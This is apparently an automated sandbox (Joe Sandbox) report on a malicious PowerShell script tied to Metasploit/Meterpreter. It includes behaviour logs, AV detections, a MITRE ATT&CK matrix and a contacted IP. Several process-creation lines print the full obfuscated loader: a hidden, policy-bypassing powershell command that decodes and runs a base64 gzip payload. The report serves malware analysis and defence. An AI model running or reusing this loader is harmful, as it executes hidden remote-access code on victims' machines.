Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3255Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4243Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4230Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1456Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 4230 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 1456 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((new-object system.io.streamreader(new-object system.io.compression.gzipstream((new-object system.io.memorystream(,[system.convert]::frombase64string((('h4siaancgwcca5vvxw/jnhb8{2}6{2}ygg'+'ojitl'+'huefxdzbdxv2ucjdegae0etamhkbw'+'srqadekqtph4v5euqa/hcdrtgy1xl8ph7cy5ka{1}zurtwo5rbhc4zz1ey6d33wd7bhselfmhn4ov8b2{1}gbre7nx6hk7sdhtj8pmyvk8mfgj/hghbcjaozg8kp1xyimkrajmui5hz'+'hxmxy8c5indvb{2}xy1xbxcoljflh2u8{1}lvdbvw7{2}puqfw8zijerlzuzphhako5k+lv4ce5evzsrbynpkasdlugl8bkzgvhr/dxmiiqjv{2}awc8da/wh+vnczp2odfbzyrk8'+'1wyfkjt5mu'+'7s+4o41vljhtfocsvwnz5jdn7+0/e8og1vxi3rfy6jvkkxnbwxy7g2fq+qrlgx2b/hvuetko3hhbvotsxfip5m/el{2}0fbncn5grsmp5mmv/dhuw6/dq+ttrifd'+'obivnre2s8sxs7klv1wnyuec0vff6hdtmqc12dv0kbuqnzus1qmhxz8oftzsgifpwa1f38oaapgezpmgk2kw{1}wxyrc6owb8ozzpqfjd{1}zueupc6i6a06zfyyptotmztw7wgtiilzug+4phv1pz0uwintu82ujtp5zub0ngvcvzpjkfho+7z88dzce6lr'+'zhu4nbrcgokcycw5/ejincbx15gt/zexe/bvrgxlrspenvw6rm5bfulybldifnratg+nekb4unbfwjx{2}qr2zdwoctk7whwmd{2}ykr653kh5ygwiscp3kmpjyla4lua6lkp{1}mm3wiusynci/2egbkx{2'+'}8i70stb7mxlmgw3fg/j{2}opcohgwy66l6nbu+ujirt+n0vr0bjcw0snijwls8px+rvwsz1jduba0nct{1}yevz1lrzlw33hacndetq3vahwy0uvvylj/mig6vt2mqrrd4nyr5rqc0y5xig{1}v66rtren6rzwhkshmemw{1}h7caycyxgk6zxtd7nbq+v7l4xvupdcso2vvoytiu016qh00pxhue6ufhwcphpvtd'+'uarphh+4zbfepv4kopp57bc3wtzkbcbw+ea6grliluwkdwmknhxp6x+t{2}ivno4ihnqli76eu5akk0jeqbsuk2hs4pfoqzlogecq{1}qjtx'+'hcdj{2}sq217xw'+'b+x/5tyf7tsv3dhvm1nvozf3rz3ip+4pene8klrr+fsh3r66lrmpboso1c1xev/7xobk74p'+'nb+svoxsh3frkgiaaa{0}')-f'=','q','9')))),[system.io.compression.compressionmode]::decompress))).readtoend()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((new-object system.io.streamreader(new-object system.io.compression.gzipstream((new-object system.io.memorystream(,[system.convert]::frombase64string((('h4siaancgwcca5vvxw/jnhb8{2}6{2}ygg'+'ojitl'+'huefxdzbdxv2ucjdegae0etamhkbw'+'srqadekqtph4v5euqa/hcdrtgy1xl8ph7cy5ka{1}zurtwo5rbhc4zz1ey6d33wd7bhselfmhn4ov8b2{1}gbre7nx6hk7sdhtj8pmyvk8mfgj/hghbcjaozg8kp1xyimkrajmui5hz'+'hxmxy8c5indvb{2}xy1xbxcoljflh2u8{1}lvdbvw7{2}puqfw8zijerlzuzphhako5k+lv4ce5evzsrbynpkasdlugl8bkzgvhr/dxmiiqjv{2}awc8da/wh+vnczp2odfbzyrk8'+'1wyfkjt5mu'+'7s+4o41vljhtfocsvwnz5jdn7+0/e8og1vxi3rfy6jvkkxnbwxy7g2fq+qrlgx2b/hvuetko3hhbvotsxfip5m/el{2}0fbncn5grsmp5mmv/dhuw6/dq+ttrifd'+'obivnre2s8sxs7klv1wnyuec0vff6hdtmqc12dv0kbuqnzus1qmhxz8oftzsgifpwa1f38oaapgezpmgk2kw{1}wxyrc6owb8ozzpqfjd{1}zueupc6i6a06zfyyptotmztw7wgtiilzug+4phv1pz0uwintu82ujtp5zub0ngvcvzpjkfho+7z88dzce6lr'+'zhu4nbrcgokcycw5/ejincbx15gt/zexe/bvrgxlrspenvw6rm5bfulybldifnratg+nekb4unbfwjx{2}qr2zdwoctk7whwmd{2}ykr653kh5ygwiscp3kmpjyla4lua6lkp{1}mm3wiusynci/2egbkx{2'+'}8i70stb7mxlmgw3fg/j{2}opcohgwy66l6nbu+ujirt+n0vr0bjcw0snijwls8px+rvwsz1jduba0nct{1}yevz1lrzlw33hacndetq3vahwy0uvvylj/mig6vt2mqrrd4nyr5rqc0y5xig{1}v66rtren6rzwhkshmemw{1}h7caycyxgk6zxtd7nbq+v7l4xvupdcso2vvoytiu016qh00pxhue6ufhwcphpvtd'+'uarphh+4zbfepv4kopp57bc3wtzkbcbw+ea6grliluwkdwmknhxp6x+t{2}ivno4ihnqli76eu5akk0jeqbsuk2hs4pfoqzlogecq{1}qjtx'+'hcdj{2}sq217xw'+'b+x/5tyf7tsv3dhvm1nvozf3rz3ip+4pene8klrr+fsh3r66lrmpboso1c1xev/7xobk74p'+'nb+svoxsh3frkgiaaa{0}')-f'=','q','9')))),[system.io.compression.compressionmode]::decompress))).readtoend()))"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		12
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
x6bjOrKFQn.ps126%ReversingLabsScript-PowerShell.Trojan.Boxter

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll100%AviraTR/Rozena.Gen
C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1832364726.000001FDF68C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1748447398.000001FDE87BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DF92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmpfalse
    		unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmpfalse
      		unknown
      https://go.micropowershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://contoso.com/powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1832364726.000001FDF68C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1748447398.000001FDE87BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://contoso.com/Licensepowershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://contoso.com/Iconpowershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://oneget.orgXpowershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://aka.ms/pscore68powershell.exe, 00000000.00000002.1748447398.000001FDE6641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767905639.000001E25DDB1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1748447398.000001FDE6641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767905639.000001E25DDB1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmpfalse
        		unknown
        https://oneget.orgpowershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        206.41.208.89
        		unknownUnited States
        		17054AS17054USfalse

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1542797
        Start date and time:2024-10-26 13:41:12 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 3m 29s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:8
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:x6bjOrKFQn.ps1
        renamed because original name is a hash value
        Original Sample Name:bfa856e4339bfadacdcb6730a256353e0b09dd0d20f0571bed84a4226b65b740.ps1
        Detection:MAL
        Classification:mal100.expl.evad.winPS1@8/15@0/1
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:
        • Successful, ratio: 91%
        • Number of executed functions: 11
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .ps1
        • Stop behavior analysis, all processes terminated

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target powershell.exe, PID 7760 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: x6bjOrKFQn.ps1

        Simulations

        Behavior and APIs

        TimeTypeDescription
        07:42:12API Interceptor16x Sleep call for process: powershell.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        206.41.208.89ODiEVZql8l.ps1Get hashmaliciousMetasploitBrowse
          j6qRCRPE7S.ps1Get hashmaliciousMetasploitBrowse
            uvwVqEMLU2.ps1Get hashmaliciousUnknownBrowse
              VbzHxB6Igc.exeGet hashmaliciousMetasploitBrowse
                BIC8Gjqv8o.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                  vjlGuNj3RD.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                    zFfvj25vqp.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                      TgggfbCYIC.exeGet hashmaliciousMetasploitBrowse
                        1dTMd9MMS3.exeGet hashmaliciousMetasploitBrowse
                          oEfBG0s28M.exeGet hashmaliciousMetasploit, MeterpreterBrowse

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            AS17054USODiEVZql8l.ps1Get hashmaliciousMetasploitBrowse
                            • 206.41.208.89
                            j6qRCRPE7S.ps1Get hashmaliciousMetasploitBrowse
                            • 206.41.208.89
                            uvwVqEMLU2.ps1Get hashmaliciousUnknownBrowse
                            • 206.41.208.89
                            VbzHxB6Igc.exeGet hashmaliciousMetasploitBrowse
                            • 206.41.208.89
                            BIC8Gjqv8o.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                            • 206.41.208.89
                            vjlGuNj3RD.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                            • 206.41.208.89
                            zFfvj25vqp.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                            • 206.41.208.89
                            TgggfbCYIC.exeGet hashmaliciousMetasploitBrowse
                            • 206.41.208.89
                            1dTMd9MMS3.exeGet hashmaliciousMetasploitBrowse
                            • 206.41.208.89
                            oEfBG0s28M.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                            • 206.41.208.89

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:@...e...........................................................

                            C:\Users\user\AppData\Local\Temp\RES45B2.tmp

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
